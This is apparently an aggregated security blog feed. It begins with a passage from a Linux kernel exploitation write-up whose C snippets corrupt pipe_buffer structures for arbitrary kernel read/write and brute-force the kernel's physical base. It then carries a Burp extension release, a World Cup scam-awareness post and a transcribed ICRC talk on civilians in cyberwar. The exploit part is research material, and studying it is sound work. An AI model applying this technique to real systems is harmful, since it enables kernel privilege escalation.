If this is the case, then we can repeatedly overwrite the seeker pipe_buffer by setting the page pointer of an overwriter pipe to the seeker pipe_buffer page. This works as follows:

  1. Calculate the struct page address of the seeker pipe_buffer page.
  2. Create another pipe – our overwriter.
  3. Trigger the use-after-free and write to the seeker pipe_buffer::page its own page.
  4. Call tee() with the seeker pipe as source and the overwriter pipe as destination.

Now we have a reliable way to overwrite the seeker pipe_buffer without reallocating it. We can use this in the following way:

void set_new_pipe_bufs_overwrite(char *buf, struct pipe_struct *overwrite, 
                                 char *obj_in_page, struct pipe_buffer *pbuf, 
                                 uint64_t new_page, uint32_t len, int *tail) 
{ 
    if(read(overwrite->read, buf, PAGE_SIZE) != PAGE_SIZE) 
        error_out("read overwriter_pipe[0]"); 
 
    struct pipe_buffer *setpbuf = (struct pipe_buffer *) obj_in_page; 
    setpbuf += (*tail) % 8; 
    (*tail)++;

    *setpbuf = *pbuf;
    setpbuf->page = (void *) new_page; 
    setpbuf->len = len; 
 
    if (write(overwrite->write, buf, PAGE_SIZE) != PAGE_SIZE) 
        error_out("write overwriter_pipe[1]"); 
} 

The read() sets the overwriter’s pipe_inode_info::tmp_page to the seeker pipe_buffer object’s underlying page. This temporary page can then be written to directly. After this, we construct the new pipe_buffer in our buffer. Finally, we write out the new seeker pipe_buffer with the overwriter pipe. Behind the scenes, the kernel copies the given contents into the physical page represented by the overwriter pipe’s pipe_inode_info::tmp_page. This circumvents repeated reallocation of the use-after-free object.

Reading and writing to the kernel image

Let’s suppose that we need to target a variable in the kernel image itself. Or that we don’t want to seek through the whole heap, instead opting to traverse a list such as via init_task to find our task and then our cred. Can we just leak a kernel image virtual address (e.g. pipe_buffer::ops) and then use the virt_to_page() formula as before?  

On x86 systems, with KASLR enabled, this is not possible. The option CONFIG_RANDOMIZE_BASE for this architecture randomizes the physical load address and the virtual base address separately. That is, one cannot be used to derive the other.  

To discover the kernel image base we need to have leaked a struct page pointer (or else have a partial overwrite primitive of the first qword of a pipe_buffer). We also need to know a byte pattern in the kernel image, at some offset, to confirm when we’ve found our target page.  

Let’s take the first qword of Ubuntu 22.04: 0x4801e03f51258d48, which introduces the startup_64 function. We’ll seek from some offset in vmemmap until we find this byte pattern in the first leaked qword read from our corrupted pipe_buffer. But doesn’t this mean we need to seek across every single page, a hard slog in 0x40-byte increments?

Luckily, the kernel can’t be loaded at any arbitrary physical address. It’s constrained by CONFIG_PHYSICAL_ALIGN. It will also be randomized above CONFIG_PHYSICAL_START. So we need only check in CONFIG_PHYSICAL_ALIGN increments.

Further, for ARM64 systems Kconfig has something different to say:

CONFIG_RANDOMIZE_BASE randomizes the virtual address at which the kernel image is loaded, as a security feature that deters exploit attempts relying on knowledge of the location of kernel internals.

This is most interesting for Android and means that physical base randomization needs to be implemented by third-party vendors.  

Regardless, it’s demonstrably feasible to brute-force the randomized physical base without any optimization. However, one method to speed things up is to search in increments of (N * CONFIG_PHYSICAL_ALIGN) and, in a single leak, check whether any of the known qwords at the N offsets into the kernel image is present.

For example, in Ubuntu’s case we have the alignment 0x200000. But we don’t want to check every 0x200000th physical address for the startup_64 qword. So we seek by (0x200000 * 8) at a time and check for any of 8 known qwords at offsets (0x200000 * (0 < n < 9)) in the kernel image. Once we find one, we displace backwards by the right offset and we’ve got the physical base.

bool search_phys_base(const char *buf, int64_t x, 
                          uint64_t *scroll_page) 
{ 
#define QWORD2 0x95e8e58948f63155 
#define QWORD3 0x6548478b4c48ec83 
#define QWORD4 0x000004c8908b0000 
#define QWORD5 0xb0458948ffffff60 
#define QWORD6 0x04ba550000441f0f 
#define QWORD7 0x4500000233840f40 
#define QWORD8 0x2524894865f8010f 
#define scale_offset(i) (((((0x200000) * i) >> 12) * 0x40)) 
 
    uint64_t first_qword = ((uint64_t *)buf)[0]; 
 
    switch (first_qword) { 
        case STARTUP_QWORD_5_15: 
            break; 
        case QWORD2: 
            *scroll_page -= scale_offset(1); 
            break; 
        case QWORD3: 
            *scroll_page -= scale_offset(2); 
            break; 
. . .

Once we’ve got the struct page representing the physical base, we can easily derive the struct page for the target object in the kernel image as the kernel image pages are ordered to be physically contiguous. For example, 
uint64_t init_task_page = kbase_page + ((INIT_TASK_OFF >> 12) * 0x40); where INIT_TASK_OFF is the known offset of the init_task in the kernel image. 

Additional considerations

Limiting factors 

As outlined above, we need to leak (or partially overwrite) a struct page pointer. We may also need to brute-force up to the physical base page for the kernel image. This latter factor can increase the running time of an exploit which uses this technique.  

It’s also not possible to write to read-only kernel memory through this method. We can’t just alter some system call’s implementation to run our own shellcode. An extension of the technique might, however, target page tables directly in order to switch permission bits to then write out to read-only memory.  

Grace factors 

The Linux memory model sees physical page frames as a substratum of raw memory – ready to be linked with virtual addresses, or used directly, when storing and loading data. This allows us to use kernel pages in pipes where there really ought to only be user pages. Further, we may be able to target other process’ user pages to leak secrets or corrupt internal data anyway. So armed with knowledge of kernel page dynamics, as well as with a pipe_buffer corruption primitive, it is possible to do very interesting things in the physical address space. 

The post pipe_buffer arbitrary read write appeared first on Interrupt Labs.

Tool Release – Web3 Decoder Burp Suite Extension

10 November 2022 at 19:13

Web3 Decoder is a Burp Suite extension that allows you to decode “web3” JSON-RPC calls that interact with smart contracts on an EVM blockchain.

As it is said that a picture is worth a thousand words, the following two screenshots show a raw JSON-RPC call and its decoded function call:

Raw eth_call to Ethereum Node
Decoded eth_call to Uniswap

Background

When auditing a DApp (Decentralized Application), its main database is usually the state of the blockchain, and in particular the state of the various smart contracts deployed on that network. Communication with these smart contract functions usually happens through JSON-RPC calls to a blockchain node, which can query the state of a smart contract or send a signed transaction that modifies its state.

For a pentester, a security auditor, or an enthusiast who wants to better understand what is going on in a DApp, or which smart contracts are being used and how, this is a tedious task, as JSON-RPC call data is RLP encoded. Fortunately for us, it is very common for projects to publish their source code and verify their smart contracts in block explorers like Etherscan, and this is where our extension comes in handy: it consults these block explorers, obtains the ABI (Application Binary Interface) of the called smart contract, and decodes its contents for us in a human-readable format.
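As a rough illustration of what the extension automates (hand-rolled here, with a hypothetical recipient and amount; the real decoding is driven by the contract’s ABI), ABI calldata is a 4-byte function selector followed by 32-byte argument words:

```python
# transfer(address,uint256) -- 0xa9059cbb is its well-known 4-byte selector
calldata = bytes.fromhex(
    "a9059cbb"
    + "000000000000000000000000" + "11" * 20  # word 1: address (left-padded)
    + "%064x" % (10**18)                      # word 2: uint256 amount (1 token, 18 decimals)
)
selector, rest = calldata[:4], calldata[4:]
words = [rest[i:i + 32] for i in range(0, len(rest), 32)]
to = "0x" + words[0][-20:].hex()      # last 20 bytes of the word
amount = int.from_bytes(words[1], "big")
print(selector.hex(), to, amount)
```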

Installation

  1. Clone our GitHub repository: https://github.com/nccgroup/web3-decoder
  2. (Optional) Create a virtualenv or install the application prerequisites on your system (see the section below)
  3. Add the file burp_web3_decoder.py to Burp as a Python extension
  4. Update your block explorer API keys to be able to perform more than 1 request every 5 seconds (more information on the README.md page)
  5. Start hacking!

We recommend following these instructions on the README.md page of the GitHub repository (which we will keep updated!).

Supporting Python3 Library and Precompiled Binaries

This extension requires Python 3 libraries, such as web3.py, that unfortunately are not available for Python 2.7 and thus cannot be used directly from Jython 2.7. As a ‘hack’, the main functionality is written in a Python 3 library that the extension executes through a Python virtual environment (talk about dirty…).
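
The bridge between Jython and Python 3 boils down to spawning a separate interpreter and exchanging JSON over stdin/stdout. Here is a minimal sketch of that pattern; it is not the extension's actual code, the helper and payload names are made up, and sys.executable stands in for the virtualenv's python3:

```python
import json
import subprocess
import sys

def call_py3_helper(payload):
    """Run a Python 3 helper process and exchange JSON over stdin/stdout.

    In the real extension the interpreter would be the virtualenv's
    python3 (or a precompiled binary); here we use sys.executable so the
    sketch is self-contained, and the helper just echoes the method name.
    """
    proc = subprocess.run(
        [sys.executable, "-c",
         "import json,sys; req=json.load(sys.stdin); "
         "print(json.dumps({'echo': req['method']}))"],
        input=json.dumps(payload),   # request travels in via stdin
        capture_output=True,
        text=True,
        check=True,
    )
    return json.loads(proc.stdout)   # response comes back via stdout

result = call_py3_helper({"method": "eth_call"})
print(result["echo"])  # eth_call
```

Because each call pays process-startup cost, this only works because decoding is an on-demand, per-message operation rather than a hot loop.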

I have created precompiled binaries of the Python 3 library for Linux, Windows and macOS. The extension will use these binaries unless it is able to execute the supporting library directly or through a Python virtual environment.

For better performance or development, you can create a virtualenv, and install as follows:

git clone https://github.com/nccgroup/web3-decoder 
cd "web3-decoder"
virtualenv -p python3 venv
source venv/bin/activate
pip install -r libs/requirements.txt

How It Works

The Burp extension creates a new editor tab when it detects a valid JSON-RPC request or response. It performs an eth_chainId JSON-RPC request to the node in use to detect which chain we are working on and, depending on the chain, selects a block explorer API by searching the chains.json file.
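
The chain detection step can be sketched as follows. The mapping below is an illustrative subset in the spirit of chains.json, not its actual contents, and the helper names are made up:

```python
import json

# Illustrative chains.json-style mapping from numeric chain ID to an
# Etherscan-compatible block explorer API (the real file holds many more).
CHAINS = {
    1: "https://api.etherscan.io/api",
    10: "https://api-optimistic.etherscan.io/api",
    137: "https://api.polygonscan.com/api",
}

def chain_id_request(request_id=1):
    """Build the eth_chainId JSON-RPC payload sent to the node in use."""
    return {
        "jsonrpc": "2.0",
        "method": "eth_chainId",
        "params": [],
        "id": request_id,
    }

def explorer_for(chain_id_hex):
    """Map the node's eth_chainId result (a hex string) to an explorer API."""
    return CHAINS.get(int(chain_id_hex, 16))

payload = json.dumps(chain_id_request())
# A mainnet node would answer {"jsonrpc":"2.0","id":1,"result":"0x1"}
print(explorer_for("0x1"))   # https://api.etherscan.io/api
print(explorer_for("0x89"))  # https://api.polygonscan.com/api
```

Keying everything off the node's own eth_chainId answer (rather than the URL the user typed) means proxied traffic to any EVM network picks the right explorer automatically.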

The extension has the following capabilities:

  • Decode of eth_call JSON-RPC calls
  • Decode of eth_sendRawTransaction JSON-RPC calls (and their inner functions)
  • Decode of response results from eth_call
  • Support for re-encoding of eth_call decoded functions
  • Automatic download of the called smart contract's ABI from the Etherscan APIs (if the contract is verified)
  • Decode of function inputs both in eth_call and eth_sendRawTransaction
  • Decode of function inputs that use “Delegate Proxy” contracts
  • Decode of function inputs called via “Multicall” contracts
  • Manual addition of contract ABIs for contracts that are not verified in etherscan
  • Support for other compatible networks (check the chains.json file)

As an example of use, to decode function calls, we need the ABI (Application Binary Interface) of the contract, which contains all functions that can be called in the contract and their inputs and outputs. For now, it works with verified contracts in the block explorer, or by manually adding the ABI. In future releases, we will explore the possibility of automatically generating an ABI by searching the function selectors in public databases.
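
To give a feel for what that decoding step does under the hood, here is a hand-rolled sketch that decodes an ERC-20 transfer(address,uint256) call from its calldata. The real extension delegates this to web3.py and the full downloaded ABI; the selector table and helper below are purely illustrative:

```python
# Calldata layout: 4-byte function selector, then 32-byte ABI-encoded words.
SELECTORS = {
    # first 4 bytes of keccak256("transfer(address,uint256)")
    "a9059cbb": ("transfer", ["address", "uint256"]),
}

def decode_calldata(data_hex):
    """Decode calldata for the few selectors in our toy table."""
    data = data_hex[2:] if data_hex.startswith("0x") else data_hex
    name, types = SELECTORS[data[:8]]
    # Each argument occupies one 64-hex-char (32-byte) word after the selector.
    words = [data[8 + i * 64: 8 + (i + 1) * 64] for i in range(len(types))]
    args = []
    for typ, word in zip(types, words):
        if typ == "address":
            args.append("0x" + word[-40:])   # address = last 20 bytes of word
        elif typ == "uint256":
            args.append(int(word, 16))       # big-endian unsigned integer
    return name, args

# Build example calldata: transfer 10**18 wei-units to an address.
calldata = ("0x" + "a9059cbb"
            + "ab5801a7d398351b8be11c439e05c5b3259aec9b".rjust(64, "0")
            + hex(10**18)[2:].rjust(64, "0"))
name, args = decode_calldata(calldata)
print(name, args[1])  # transfer 1000000000000000000
```

The selector is the only self-describing part of calldata, which is exactly why the ABI (mapping selectors to names and argument types) has to come from a block explorer or be supplied manually.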

The following “flow” diagram shows in a simplified way the process that the eth_decoder library follows when decoding eth_call JSON-RPC calls:

Flow Diagram of decoding an ETH CALL to a smart contract function

Chains Supported so far

All supported chains can be found in the chains.json file. These are chains that have a block explorer with the same APIs as Etherscan.

At the moment of writing, the following list of EVM chains were supported by this extension:

  • Ethereum Mainnet
  • Ropsten
  • Rinkeby
  • Goerli
  • Optimism
  • Cronos
  • Kovan
  • BSC
  • Huobi ECO
  • Polygon
  • Fantom
  • Arbitrum
  • Sepolia
  • Aurora
  • Avalanche

If you want to add more blockchain explorers, add them to the chains.json file, test that it works, and make a pull request! (Or if you are not sure of how to do all this, simply create an issue asking for it!)

Future Work

  • Aggregate other types of Proxy / Multicall contracts
  • Decode functions without an ABI, based on public Ethereum signature databases such as 4byte.directory or the offline Panoramix 4byte signature database

I am always more than happy to consider adding new features to the extension or the supporting library, so feel free to come by the Github page and create an issue with any features that you may want! (or with any bug that you find!)

Don’t Get Caught Offsides with These World Cup Scams

9 November 2022 at 12:03

Authored by: Christy Crimmins and Oliver Devane

Football (or Soccer as we call it in the U.S.) is the most popular sport in the world, with over 3.5 billion fans across the globe. On November 20th, the men’s World Cup kicks off (pun intended) in Qatar. This event, a tournament played by 32 national teams every four years, determines the sport’s world champion. It will also be one of the most-watched sporting events of at least the last four years (since the previous World Cup). 

An event with this level of popularity and interest also attracts fraudsters and cyber criminals looking to capitalize on fans’ excitement. Here’s how to spot these scams and stay penalty-free during this year’s tournament. 

New Cup, who’s this? 

Phishing is a tool that cybercriminals have used for years. Most of us are familiar with the telltale signs: misspelled words, poor grammar, and a sender whose email address makes no sense or whose phone number is unknown. But excitement and anticipation can cloud our judgment. What football fan wouldn’t be tempted to win a free trip to see their home team participate in the ultimate tournament? Cybercriminals are betting that this excitement will cloud fans’ judgment, leading them to click on nefarious links that ultimately download malware or steal personal information. 

It’s important to realize that these messages can come via a variety of channels, including email, text messages (also known as smishing), and other messaging channels like WhatsApp and Telegram. No matter the source, it’s essential to remain vigilant and pause to think before clicking links or giving out personal or banking information.  

For more information on phishing and how to spot a phisher, see McAfee’s “What is Phishing?” blog. 

Real money for fake tickets 

According to ActionFraud, the UK’s national reporting center for fraud and cybercrime, thousands of people were victims of ticket fraud in 2019—and that’s just in the UK. Ticket fraud is when someone advertises tickets for sale, usually through a website or message board, collects the payment and then disappears, without the buyer ever receiving the ticket.  

 

The World Cup is a prime (and lucrative) target for this type of scam, with fans willing to pay thousands of dollars to see their teams compete. Chances are most people have their tickets firmly in hand (or digital wallet) by now, but if you’re planning to try a last-minute trip, beware of this scam and make sure that you’re using a legitimate, reputable ticket broker. To be perfectly safe, stick with well-known ticket brokers and those who offer consumer protection. Also beware of sites that don’t accept debit or credit cards and only accept payment in the form of bitcoin or wire transfers such as the one on the fake ticket site below:  

The red box on the right image shows that the ticket site accepts payment via Bitcoin.  

Other red flags to look out for are websites that ask you to contact them to make payment, where the only contact information is via WhatsApp. 

Streaming the matches 

Let’s be realistic—most of us are going to have to settle for watching the World Cup from the comfort of our own home, or the pub down the street. If you’re watching the tournament online, be sure that you’re using a legitimate streaming service. A quick Google of “FIFA World Cup 2022 Official Streaming” along with your country should get you the information you need to safely watch the event through official channels. The FIFA site itself is also a good source of information.  

Illegal streaming sites usually contain deceptive ads and malware which can cause harm to your device.  

Don’t get taken to the bank 

In countries or regions where sports betting is legal, the 2022 World Cup is expected to drive an increase in activity. There’s no shortage of things to bet on, from a simple win/loss to the exact minute a goal will be scored by a particular player. Everything is subject to wager.   

As with our previous examples, this increase in legitimate gambling brings with it an increase in deceptive activity. Online betting scams often start when users are directed to, or search for, a gambling site and end up on a fraudulent one. After placing their bets and winning, users realize that while they may have “won” money, they are unable to withdraw it; sometimes they are even asked to deposit more money to make the winnings available, and even then, they still won’t be. By the end of this process, the bettor has lost all their initial money (and potentially more), as well as any personal information they shared on the site.  

Like other scams, users should be wary of sites that look hastily put together or are riddled with errors. Your best bet (yes, again, pun intended) is to look for an established online service that is approved by your government or region’s gaming commission. Finally, reading the fine print on incentives or bonuses is always a good idea. If something sounds too good to be true, it’s best to double-check. 

For more on how you can bet online safely, and for details on how legalized online betting works in the U.S., check out our blog on the topic.  

Keep that Connection Secure 

Using a free public Wi-Fi connection is risky. User data on these networks is unprotected, which makes it vulnerable to cybercriminals. Whether you’re traveling to Qatar for a match or watching the matches with friends at your favorite pub, if you’re connecting to a public Wi-Fi network, make sure you use a trusted VPN connection. 

Give scammers a straight red card this World Cup 

For more information on scams, visit our scam education page. Hopefully, with these tips, you’ll be able to enjoy and participate in some of the World Cup festivities, after all, fun is the goal!  

The post Don’t Get Caught Offsides with These World Cup Scams appeared first on McAfee Blog.

LABScon Replay | Are Digital Technologies Eroding the Principle of Distinction in War?

By: LABScon
10 November 2022 at 14:09

Until now, the cyber capabilities of a State have been assessed primarily from a technical and tactical perspective: the coordination of APT teams, the quality of malware, and the sophistication of exploits, to give some examples. However, describing such cyber operations is no longer sufficient to understand the capabilities that States deploy in the digital sphere during armed conflicts.

Cyber activities are part of a broader, digital context. Armies in conflict are increasingly digitized, as are the populations involved. States may encourage civilians to engage in offensive cyber operations against targets associated with the enemy, or encourage users to contribute to the military effort.

In this presentation, One Click from Conflict: Are Digital Technologies Eroding the Principle of Distinction in War?, the ICRC’s Mauro Vignati discusses how technology has completely transformed the way civilians live through armed conflicts.

In recent conflicts, smartphones and apps especially have become weaponized, slowly removing traditional barriers that divide the roles of civilians and combatants. Mauro breaks down the dangers and consequences of this paradigm shift and discusses what states and private organizations can do to stop technological weaponization from harming civilians caught in wartime.

One Click from Conflict: Are Digital Technologies Eroding the Principle of Distinction in War?: audio automatically transcribed by Sonix. This transcript may contain errors.

Mauro Vignati:
Hi everyone, thank you for having me. I am with the ICRC, the International Committee of the Red Cross. Let's see who knows what we do and who we are: just raise your hand. Okay. So, to refresh the memory: we are an international organization, a humanitarian organization, based in Geneva, Switzerland. Our mandate is to provide humanitarian help and to help victims of armed conflict in relief operations, wherever there is a need.

And you may start to wonder why we are here, right? What is a humanitarian organization doing here? It is because, with the digitalization of societies, we are seeing an increase, a transformation, in how wars are fought. States are adding more and more digital means and methods to their arsenal, and one of the worst trends we are seeing nowadays is that digital technologies are bringing civilians and private sector technology companies into the battlefield. When I talk about private companies, I mean cybersecurity companies and technology companies that are being brought into the battlefield. One of the most important principles for the ICRC is international humanitarian law. This is a body of law, and one of its most important principles is that it defines two main groups of individuals and objects.

The first group is the combatants and the military objectives; the combatants are the people fighting on behalf of an army. The second group is the civilians and civilian objects. They should refrain from resorting to combat, from going into the battlefield, and in turn they should be protected against the harms and dangers that war produces. This is the principle of distinction: we have to distinguish between who is fighting the war and the rest of the population.

This shift to digital technologies has a qualitative aspect and a quantitative one. From the qualitative perspective, the digitalization of societies has several effects. One of them is that it lowers the threshold for entering the battlefield: with some exaggeration, we can say that nowadays everyone with a smartphone can join the battlefield and do something for an army party to a conflict. It also completely modifies the sense of remoteness that we have; we can sit on our couch and participate in a battlefield on the other side of the planet. From a quantitative perspective, states can scale up a massive number of civilians to do what they need, regrouping hundreds of thousands of civilians in hours or days so that they are able to fight for them. Another aspect is the expansion of the attack surface: the same smartphone that can be used to attack could also be the victim of an attack.

Mauro Vignati:
And it is not just the smartphone; laptops, computers, servers, whatever. The attack surface is way bigger than what we have in the physical world. This brings us to what we call the civilianization of the battlefield. Based on that, let's go through a couple of scenarios to better explain the situation and the challenges we are facing here.

The first scenario is about states that may encourage civilians to engage in offensive cyber operations against targets associated with the enemy: the state asking its own civilians to participate in a conflict on the digital battlefield. This has multiple advantages for a state. Individuals can be easily mobilized and coordinated, so as I said before, you can put together hundreds of thousands of people to fight in your name, and you can federate already existing activists who can be deployed for your purpose. All these characteristics lower the cost, for the state, of entering and fighting on the battlefield, because it can use civilians to do this work. That is the first scenario. The second scenario is that states may repurpose existing e-government apps, or create new ones, to be used for the battlefield.

Mauro Vignati:
Here we are talking about states that provide an app you can use to, for instance, take a picture of an enemy tank and send it back to the army's central command and control, to be used for the effort on the kinetic side. This has multiple advantages from the state's perspective, because you are tapping into an existing community of digital citizens.

Can you imagine? If you have a government app that is already used by three, four, five million people, at some point you enhance this application with new functions and push this new version out to the three, four, five million people who are already using it. This means you don't need any training for the people using the application, because they are already used to it: you open it, take a picture, and send the picture. This is a normal gesture we do daily, so no training is required. It also means there is no latency. You don't have to train military people on the ground; you just have civilians on the digital battlefield who can adapt and use this application very quickly.

Mauro Vignati:
And this means that civilians are becoming sensors for the army, not just for intelligence purposes, but for any other kind of activity that the state would like to start on the digital battlefield. This brings us to a third scenario, where we have technology companies, cybersecurity companies, generally speaking private companies, jumping into the digital battlefield.

As you may know, the majority of networks are owned or managed by private companies, and they also manage assets that are military assets, not only civilian assets. So when a war starts, those companies are inside the battlefield, because they are already providing support or managing the networks of those governmental bodies. One characteristic of this is that those companies end up defending against deliberate cyber attacks: if you already provide this kind of service to governmental bodies, you find yourself defending against deliberate cyber attacks, and you share threat intelligence with government bodies, with states that are at that moment at war. So those are the three scenarios of how civilians and private companies are involved in the battlefield. And here is a first batch of considerations about the situation we are seeing at the moment: APTs, that is, state-sponsored cyber attacks, are no longer the only way to assess state capabilities in the digital sphere.

Mauro Vignati:
There are many more digital means and methods that have to be integrated when we analyze the capacity of a state in this sector. The second consideration is that private companies and civilians are now playing a preponderant role in conflicts. What I mean by this is that when an army is losing visibility or capability on the battleground, it can use civilians to regain that visibility and capability, and even surpass the capability of a state on the battlefield. So the consideration is that we are witnessing a civilianization of the battlefield; this is the trend at the moment.

And this is a worrisome trend, because we are bringing civilians into the battlefield. A second package of considerations is that we still lack a cognitive process for this. What does that mean? It means that we are far from the battlefield, but at the same time we are in the battlefield using digital means. There is a distance between what we are living and what we are doing. This kind of process is something we are still lacking nowadays, even after 30 or 40 years of using these technologies. And this brings us to the perception of anonymity: when we are running a DDoS attack using a VPN, we think we are anonymous on our couch.

Mauro Vignati:
This perpetuates the anonymity, and with it the sense of impunity: we think nobody will find us, because we are using all the security measures we can put in place to not be seen.

Another consideration is the performative nudging by the state. What does that mean? It means that the state, when it is enhancing and modifying an application, is gently pushing civilians to use, for war purposes, an application that is already on their phones. And it is performative because as soon as this new capacity is put into a new version of the application and pushed to the store, and then onto the phones, it is used very quickly. Then there is the speed of integration, which we already mentioned: it is very fast to integrate civilians into the battlefield. And then we have the involvement of private companies that do normal business in peaceful times and at some point find themselves in the battlefield. The third group of considerations is: are civilians and private companies directly participating in hostilities? This is the most important part: are the people doing these kinds of activities participating in hostilities? We look at three cumulative characteristics for someone to be considered as participating in hostilities.

Mauro Vignati:
This is just a way to explain how it works; I am not saying that one scenario or another is direct participation. Of the three scenarios we saw before, we can say that, depending from case to case, they could be considered as participating in hostilities. But normally we should look at three cumulative aspects. The first is the threshold of harm: if you carry out the act, you have an impact on the military operations of a party to the conflict; there is a real impact from what you are doing. The second is the belligerent nexus: whether you have designed the act to reach the threshold of harm, whether there is an intent, in designing the act, to cause this harm. And the third is direct causation: whether we can establish that the harm was caused by your intervention. Those are the three characteristics. If the act you are performing has these three characteristics, you are probably participating in an armed conflict. There are other aspects we have to look at before saying that one or another scenario is direct participation in hostilities. One is the temporal consideration, "for such time".

Mauro Vignati:
What does that mean? In our perspective, the ICRC's perspective, if a civilian opens an application and takes a picture, or runs a DDoS attack, and then closes the application, only during that time could the civilian, and I say could, be considered as participating in hostilities; as soon as the application is closed, they are no longer considered as participating. Some critics of ours say that this makes it too easy for civilians to go into the battlefield and come out of it again, a kind of revolving door; but again, case by case. Then there is the territorial consideration: are you performing your act from inside the battleground or from outside it? These are all the different perspectives that have to be checked. After all that, what are the consequences of everything here? The first consequence, if you are directly participating, is that you are not entitled to prisoner of war status. And because you are a civilian participating in hostilities, you may lose immunity from domestic prosecution. Let me explain: imagine you attack a country with your own means, at some point the war is over, and some years later you want to travel to that country for a vacation. You could be prosecuted in that country because you participated in hostilities, and you have no immunity for that.

Mauro Vignati:
This also means that you lose protection from attacks, and when we talk about attacks, it is not just cyber attacks but also physical attacks. Someone who is participating in hostilities could lose the protection from being attacked, even in a physical way. Then there are the consequences for states. It is mandatory for a state to verify whether a person participating is a combatant or a civilian: to distinguish, as we said before, following the principle of distinction.

The second one is the obligation of constant care. This means that states have the obligation to take precautions to protect civilians. But this is absolutely in tension with the fact that states are nudging or pushing civilians into the battlefield: how can you nudge and push civilians onto the battlefield and at the same time make sure you exercise constant care towards them? The third one is that states have to respect international humanitarian law and, where relevant, international human rights law, such as the right to life: bodies of law that are fundamental, also when we talk about the territoriality of the battlefield. And another consequence, this time for private companies, is, as for civilians, the possible loss of protection from being attacked.

Mauro Vignati:
Even tech companies that are involved in the battlefield could face this situation if they are engaging in DPH for one of the parties to the conflict. And one very interesting point is that tech and cybersecurity company property may become a military objective. Imagine you have a platform for sharing intelligence with a government body, this government is involved in a war, and you provide cyber threat intelligence to this state through the platform. This platform could become, and I say could because again it depends from case to case, a military objective of a party to the conflict. So this platform could be disrupted by one of the other parties to the conflict.

And this brings us also to the territorial consideration that we saw for civilians. From the perspective of international humanitarian law, there is no difference whether you are doing this from inside the battlefield territory or from outside it. But there are other bodies of law, like human rights law, that do take territorial considerations into account. Technology and cybersecurity companies could also be considered an organized armed group; again, with exceptions, and case by case. But it is possible that a tech company providing defensive capability, or even active defense capability, could be considered an organized armed group by one of the armies, one of the parties to the conflict.

Mauro Vignati:
You can imagine the consequences of being considered an organized armed group. This brings us to the conclusions. The first one is about civilians: civilians must be aware. We are not talking anymore about taking down a ransomware group's server or the C2 of a state-sponsored APT group. We are talking about participating in a conflict. This completely changes the situation you are involved in. You have to be aware of what you are doing when you type on your keyboard, because you can be attacked; again, with distinctions, case by case, but there can be a kinetic or non-kinetic answer to what you are doing.

The second conclusion is for states. We stress the fact that states have to respect the principle of distinction between civilians and combatants. This is very important, and the situation is very worrisome, because we are seeing a fusion between the two groups. And if you really are bringing civilians into the battlefield, please prioritize harmless forms of civilian involvement, like, I don't know, rebuilding disrupted connections or setting up servers or whatever; do not use civilians for the aims of the war.

Mauro Vignati:
The third one is: provide civilians with information. If the state provides all the information to civilians, saying, hey, you can do this and that, and if you do the other thing you take responsibility for your acts, then at least the state can be said to have provided all the information civilians need to judge the situation. And logically, comply with your duties under international humanitarian law and human rights law (we said before that we see a tension here between the duty and what is happening in reality) and with the obligation of constant care.

As we have said before: do not involve civilians, shield civilians against this civilianization of the battlefield, and try to reverse the civilianization of the battlefield. This trend must be stopped, because we are seeing more and more tech companies and more and more civilians on the battlefield. And lastly, for the companies: we think that companies need more awareness of, and training in, international humanitarian law. We have had discussions with several tech companies and cybersecurity companies on this topic, and it opened their eyes; they were not aware of this. So it is very important that they start building awareness through training, and then prevent targeting mistakes. When you do offensive security or something like that, be sure, if you shut down a command and control, that it is a dedicated military command and control, not a dual-use command and control that is also used for civilian purposes. And proactively inform, as a company, about what you are doing, to avoid being attacked.

Mauro Vignati:
So if you are doing protection or whatever,
just let the world know what you’re doing

Mauro Vignati:
during the conflict. And you should also
develop compliance in your companies and say,

Mauro Vignati:
Hey, how are we doing the right? How are we
now shifting to be a participant in the right

Mauro Vignati:
to a conflict or not?

So you have to be aware of what you are doing during this period, and then try to lobby to ensure that civilian data is protected as a civilian asset. Until now, civilian data has not had the same level of protection as a civilian asset. We advocate considering civilian data protected as a civilian asset, because when you disrupt civilian data, you can cause a very harmful situation for civilians.

And most important, we discussed all this the other day with the attack against a satellite infrastructure: try to do segmentation of the assets that you are providing to a government. If a government wants to have an asset from your company, try to split between the civilian body of the government and the military body of the government, so that when a war breaks out and someone is trying to attack those assets, they are going to focus on the military one. Thank you.

Speaker2:
Thank you. We have time for questions. Quickly, quickly. Just raise your hands.

Speaker3:
Hi there. Thanks. Really enjoyed the talk. Just one question. It seemed like an overarching theme in this is that there’s sort of a dual-use nature to all of this stuff: like you said, a cloud provider could be supporting a military and could also be supporting civilian businesses. And from a defender’s perspective, threats can be nation-state, they can be non-nation-state, whatever. You might just not care as a defender; you just want to protect your own system. So, because that distinction is hard on both sides, do you see any room, maybe on the policy side or the regulatory framework side, for something that could help clarify that and deal with these dual-use technologies in a way that helps distinguish civilian and military objectives?

Mauro Vignati:
Thank you for the question. I’m thinking that if you have a contract with the government, then from the starting point you have to define: is this a military asset, is this a civilian asset? You have to be open with the government and say what the purpose of our help here is, what kind of infrastructure we are securing. And then it’s up to you as a company to say, I don’t want to protect a military entity, because in case of war I’m protecting something that can bring me to the battlefield. So it is up to the company to have this capability of distinguishing, already from the beginning of the contract, and to be clear with the government about what they’re doing.

Speaker3:
One of the issues that you have to deal with, in both hot and cyber conflicts, might be mercenaries. So what are your thoughts on identifying private companies who might be affiliated with governments?

Mauro Vignati:
That’s a good question. I mean, international humanitarian law does not prohibit participation in war. So it is up to everybody to decide if they want to participate in a war, but they have to behave in a manner such that they do not commit war crimes.

Mauro Vignati:
But from this point of view, you have to be aware of the fact that if you are a mercenary participating in a conflict, you can be attacked afterward by one of the parties to the conflict, even in kinetic ways. So we’re talking about a kinetic reaction to a cyber operation. This is up to everyone to decide. We try to get in touch with those mercenaries, with the groups of people that are cooperating with one or the other party, and try to explain to them the dangers bound up in this situation, just so that they know what they are facing. Thank you.

Mauro Vignati:
Yeah. We take one last.

Speaker2:
One more, last one, quickly. We have this man from Geneva all the way here; we have to make all the use of his time that we can.

Speaker3:
Go ahead. With digital warfare, more and more people have equal access to be a part of war. They don’t have to be on a military base; they don’t have to grow up and go to boot camp. And I think, as people in general, we have a desire to fight for something. So you talk about trying to stop this civilianization of warfare, but I think it’s the civilians that are wanting to be a part of something. Could there be a benefit to having the states provide a way for civilians to actively defend their country, which might shoo them away from trying to be offensive and potentially more damaging? And if so, is that even something that’s realistic or possible for states: to give their citizens a way to defend without also creating a vulnerability for other countries to come in and know what’s not defended or what needs to be fixed?

Mauro Vignati:
